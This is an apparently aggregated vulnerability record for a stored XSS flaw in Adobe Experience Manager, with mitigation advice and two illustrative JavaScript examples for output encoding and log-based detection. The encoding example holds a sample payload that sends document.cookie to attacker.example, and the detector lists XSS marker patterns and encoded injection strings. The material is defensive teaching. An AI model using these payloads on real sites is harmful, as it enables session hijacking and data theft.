
CVE-2025-61797: Cross-site Scripting (Stored XSS) (CWE-79) in Adobe Experience Manager

Severity: Medium
Tags: Vulnerability, CVE-2025-61797, CWE-79
Published: Tue Oct 14 2025 (10/14/2025, 21:18:13 UTC)
Source: CVE Database V5
Vendor/Project: Adobe
Product: Adobe Experience Manager

Description

Adobe Experience Manager versions 11.6 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. Exploitation of this issue requires user interaction in that a victim must open a malicious link. Scope is changed.

AI-Powered Analysis

Last updated: 10/14/2025, 21:41:33 UTC

Technical Analysis

CVE-2025-61797 is a stored cross-site scripting (XSS) vulnerability, classified under CWE-79, affecting Adobe Experience Manager (AEM) versions 11.6 and earlier. An attacker holding a low-privileged account can inject JavaScript into form fields whose values are stored and later written into a page without proper output encoding. When another user views the page that renders the stored field, the script runs in that user's browser within the origin of the AEM site, so it can read whatever that origin exposes to script (DOM contents, responses to requests issued with the victim's session, and any cookies not flagged HttpOnly) and can issue requests that carry the victim's privileges.

Exploitation requires user interaction: per the advisory the victim must open a malicious link, so the attacker has to lure a user to the page that carries the injected field. The CVSS 3.1 base score is 5.4 (Medium) with vector AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N: network attack vector, low attack complexity, low privileges required, user interaction required, scope changed, low confidentiality and integrity impact, and no availability impact. "Scope changed" has its CVSS meaning here: the vulnerable component is the AEM application, but the impacted component is the victim's browser, and the consequences are bounded by the victim's privileges rather than the attacker's. Because a stored payload is served to every visitor of the affected page, an administrator or content author who views it is the most valuable target.

At the time of this analysis no patches or known exploits are reported for this record. Organizations relying on AEM for web content management, particularly deployments that expose user-editable forms to low-privileged accounts, should treat it as a standard stored XSS: session hijacking where cookies are readable by script, actions performed with the victim's privileges, content manipulation, and delivery of further browser-side payloads are the realistic outcomes.

Potential Impact

For European organizations the impact of CVE-2025-61797 depends on where AEM sits: public-facing websites, customer portals and intranets all render stored content to users whose sessions are worth stealing. A successful injection executes in the victim's browser with their privileges on the site, so the realistic outcomes are hijacked sessions (where session cookies are readable by script), actions performed as the victim, exposure of data the victim can see, and loss of web content integrity. Where that data is personal data, a breach falls under the GDPR notification and penalty regime, and the reputational cost of serving malicious script from a trusted domain comes on top of any regulatory one.

The user-interaction requirement is a modest barrier: the link the victim must open points at the organization's own site, which phishing and social-engineering campaigns exploit readily. The Medium score reflects the limited per-victim impact, but because the payload is stored and served to everyone who views the page, and because the scope change means the effect lands in the victim's browser rather than the attacker's, a payload viewed by an author or administrator can reach well beyond what a low-privileged attacker could do directly. Sectors that commonly run AEM for digital content delivery, including finance, government, healthcare and media, are therefore the most exposed, and failure to address the issue risks regulatory penalties and loss of customer trust.

Mitigation Recommendations

Apply the vendor fix first: update Adobe Experience Manager to a release that addresses CVE-2025-61797 as soon as Adobe publishes one. At the time of writing this record lists no patch, so the remaining measures are compensating controls, not substitutes.

Fix the rendering, not only the input. Stored XSS is an output-encoding failure: the stored value is written into HTML without being encoded for the context it lands in. Validation at ingestion (length, character set, expected format) narrows the attack surface but cannot be relied on, because the same value may be rendered in a text node, an attribute, a URL or inline script, each of which needs different encoding. In AEM this means rendering field values through HTL with its default contextual escaping (or an explicit `context=` that matches the location) rather than `context='unsafe'`, and using the Sling XSSAPI encoders (`encodeForHTML`, `encodeForHTMLAttr`, `encodeForJSString`) in Java components.

Deploy a Content Security Policy that actually blocks injected script: a nonce- or hash-based `script-src` without `'unsafe-inline'`, since a stored payload is by definition inline. Mark session cookies `HttpOnly` (and `Secure`, `SameSite`) so a successful injection cannot simply read them; the script can still act as the victim, which is why the scope change matters.

Detect attempts. Monitor application and web-server logs for form submissions containing script markers (`<script`, `onerror=`, `javascript:`), including URL-encoded and double-encoded forms, and treat pattern hits as triage leads rather than proof. A Web Application Firewall with XSS rules tuned to the AEM form endpoints raises the bar but is bypassable and should not be the only control.

Limit the blast radius. Restrict which accounts can write to form-backed content, review existing low-privileged accounts, and keep AEM author and administrative interfaces off the public internet and separated from the publish tier. Conduct regular security reviews and penetration tests that target XSS in form-handling components, and remind users that links to the organization's own site can carry an attacker's payload.
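The rendering failure described in the analysis and the encoding and CSP recommendations above, shown in one place as an added example. This is illustrative JavaScript written for this page, not AEM or HTL code and not from the advisory; the stored field value, the template, and the `encodeForHtml` helper are constructed for the demonstration. It renders a stored field the vulnerable way (raw concatenation) and the hardened way (context-aware encoding), and builds the nonce-based CSP header that would stop an inline payload that slipped through.

```javascript
// Added illustration (not AEM code): how a stored form-field value becomes
// script, and how context-aware output encoding neutralises it.
const crypto = require("crypto");

// Constructed sample: the value a low-privileged user stored in a form field.
// It closes the attribute it lands in and opens a tag with an event handler.
const STORED_FIELD =
  '"><img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">';

// Vulnerable pattern: the stored value is concatenated straight into HTML,
// once inside a double-quoted attribute and once as a text node.
function renderVulnerable(value) {
  return `<input type="text" name="comment" value="${value}">` +
         `<p class="preview">${value}</p>`;
}

// Encoder for an HTML text node or a double-quoted attribute value. It
// rewrites the five characters that can change HTML structure. Other
// contexts (URLs, inline script, CSS) need their own encoders.
function encodeForHtml(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#x27;");
}

// Hardened pattern: same template, every interpolation passes through the
// encoder that matches its context (both locations here are HTML contexts).
function renderHardened(value) {
  const safe = encodeForHtml(value);
  return `<input type="text" name="comment" value="${safe}">` +
         `<p class="preview">${safe}</p>`;
}

// Structural check used to compare the two renderings: does the markup
// contain an opening tag the template author did not write?
function containsInjectedMarkup(html) {
  const tags = html.match(/<[a-zA-Z][^>]*>/g) || [];
  const expected = new Set(["input", "p"]);
  return tags.some(t => !expected.has(t.slice(1).split(/[\s>]/)[0]));
}

// Compensating control: a per-response CSP nonce. Inline script that does
// not carry the nonce is refused by the browser even if encoding is missed.
function newNonce() {
  return crypto.randomBytes(16).toString("base64");
}
function cspHeader(nonce) {
  return `default-src 'self'; script-src 'self' 'nonce-${nonce}'; ` +
         `object-src 'none'; base-uri 'none'`;
}

console.log("vulnerable:", renderVulnerable(STORED_FIELD));
console.log("hardened:  ", renderHardened(STORED_FIELD));
console.log("Content-Security-Policy:", cspHeader(newNonce()));
```

The hardened output shows the stored payload as literal text (`&lt;img ...`) in both positions, which is the behaviour HTL's contextual escaping or the Sling XSSAPI encoders provide in a real AEM component. The nonce must be generated per response and placed on every legitimate `<script>` tag; a static nonce or an `'unsafe-inline'` fallback gives the injected script the same permission as the site's own.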
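The log-monitoring recommendation above, as an added detection example. This is not tooling from Adobe or from this page; the log format (one JSON object per line with method, path and URL-encoded body, as a request-logging proxy might record it), the sample lines and the marker patterns are all constructed for the illustration. The point it adds is that parameters must be URL-decoded, repeatedly, before matching, otherwise a double-encoded `%253C` payload passes straight through.

```javascript
// Added detection example: flag form submissions whose parameters carry
// script-injection markers. The log lines below are constructed samples.
const LOG_LINES = [
  '{"ts":"2025-10-14T21:18:13Z","ip":"203.0.113.7","user":"author1","method":"POST","path":"/content/forms/af/contact.html","body":"name=Alice&comment=Thanks+for+the+help"}',
  '{"ts":"2025-10-14T21:19:02Z","ip":"203.0.113.9","user":"guest42","method":"POST","path":"/content/forms/af/contact.html","body":"name=x&comment=%22%3E%3Cimg+src%3Dx+onerror%3Dalert(1)%3E"}',
  '{"ts":"2025-10-14T21:19:40Z","ip":"203.0.113.9","user":"guest42","method":"POST","path":"/content/forms/af/contact.html","body":"name=x&comment=%2522%253E%253Cscript%253E"}',
  '{"ts":"2025-10-14T21:20:11Z","ip":"198.51.100.3","user":"author2","method":"GET","path":"/content/site/page.html?q=javascript%3Aalert(1)","body":""}',
];

// Indicators of an attempt to break out of an HTML context. They are
// deliberately broad and will produce false positives on legitimate text
// that mentions markup; hits are triage leads, not proof.
const MARKERS = [
  /<\s*script/i,
  /<\s*(img|svg|iframe|object|embed|body|video|audio)\b/i,
  /\bon[a-z]+\s*=/i,        // event-handler attributes: onerror=, onload=
  /javascript\s*:/i,
  /[<>"'][^<>]*[<>]/,       // close one context, then open a tag
];

// Decode repeatedly (bounded) so %253C (double-encoded "<") is seen as "<".
// Stops when a round changes nothing or when the input is malformed.
function fullyDecode(s, maxRounds = 3) {
  let cur = s.replace(/\+/g, " ");
  for (let i = 0; i < maxRounds; i++) {
    let next;
    try { next = decodeURIComponent(cur); } catch { break; }
    if (next === cur) break;
    cur = next;
  }
  return cur;
}

// Split a URL-encoded query string or form body into decoded pairs.
function parseParams(qs) {
  if (!qs) return [];
  return qs.split("&").filter(Boolean).map(pair => {
    const idx = pair.indexOf("=");
    const k = idx < 0 ? pair : pair.slice(0, idx);
    const v = idx < 0 ? "" : pair.slice(idx + 1);
    return { name: fullyDecode(k), value: fullyDecode(v) };
  });
}

// Inspect one log record: every query and body parameter is checked
// against every marker; the decoded value is kept for the analyst.
function inspect(line) {
  const rec = JSON.parse(line);
  const qIdx = rec.path.indexOf("?");
  const query = qIdx < 0 ? "" : rec.path.slice(qIdx + 1);
  const params = [...parseParams(query), ...parseParams(rec.body)];
  const hits = [];
  for (const p of params) {
    const matched = MARKERS.filter(re => re.test(p.value)).map(re => re.source);
    if (matched.length) hits.push({ param: p.name, value: p.value, matched });
  }
  return { ts: rec.ts, ip: rec.ip, user: rec.user, path: rec.path.split("?")[0], hits };
}

// Return only the records with at least one hit.
function scan(lines) {
  return lines.map(inspect).filter(r => r.hits.length > 0);
}

for (const alert of scan(LOG_LINES)) {
  console.log(`${alert.ts} ${alert.ip} ${alert.user} ${alert.path}`);
  for (const h of alert.hits) {
    console.log(`  ${h.param}=${JSON.stringify(h.value)} [${h.matched.join(", ")}]`);
  }
}
```

Run against the sample, the benign submission is silent, the plainly encoded `<img onerror>` and the double-encoded `<script>` from the same account are both reported, and the `javascript:` URI in a GET query string is caught as well. Correlating repeated hits from one low-privileged user, as here, is the signal worth escalating; a single hit on a field that legitimately accepts HTML snippets usually is not.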


Technical Details

Data Version: 5.1
Assigner Short Name: adobe
Date Reserved: 2025-10-01T17:52:06.975Z
CVSS Version: 3.1
State: PUBLISHED

Threat ID: 68eec00f519df59857dc719b

Added to database: 10/14/2025, 9:26:39 PM

Last enriched: 10/14/2025, 9:41:33 PM

Last updated: 10/15/2025, 1:57:41 AM


